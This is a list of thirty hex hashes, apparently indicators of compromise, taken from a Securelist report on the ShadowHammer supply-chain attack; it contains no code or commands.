e7dcfa8e75b0437975ce0b2cb123dc7b
6cf305a34a71b40c60722b2b47689220
e8db4206c2c12df7f61118173be22c89
6e94b8882fe5865df8c4d62d6cff5620
ea3b7770018a20fc7c4541c39ea271af
7d9d29c1c03461608bcab930fef2f568
eac3e3ece94bc84e922ec077efb15edd
807d86da63f0db1fc746d1f0b05bc357
ecf865c95a9bec46aa9b97060c0e317d
849a2b0dc80aeca3d175c139efe5221c
ef43b55353a34be9e93160bb1768b1a6
8505484efde6a1009f90fa02ca42f011
f0ba34be0486037913e005605301f3ce
8578f0c7b0a14f129cc66ee236c58050
f2f879989d967e03b9ea0938399464ab
86a4cac227078b9c95c560c8f0370bf0
f4edc757e9917243ce513f22d0ccacf2
8756bafa7f0a9764311d52bc792009f9
f9d46bbffa1cbd106ab838ee0ccc5242
87a8930e88e9564a30288572b54faa46
fa83ffde24f149f9f6d1d8bc05c0e023
88777aacd5f16599547926a4c9202862
fa96e56e7c26515875214eec743d2db5
8baa46d0e0faa2c6a3f20aeda2556b18
fb1473e5423c8b82eb0e1a40a8baa118
8ef2d715f3a0a3d3ebc989b191682017
fcfab508663d9ce519b51f767e902806
092ae9ce61f6575344c424967bd79437
7f05d410dc0d1b0e7a3fcc6cdda7a2ff
eb37c75369046fb1076450b3c34fb8ab

Source: https://securelist.com/operation-shadowhammer-a-high-profile-supply-chain-attack/90380/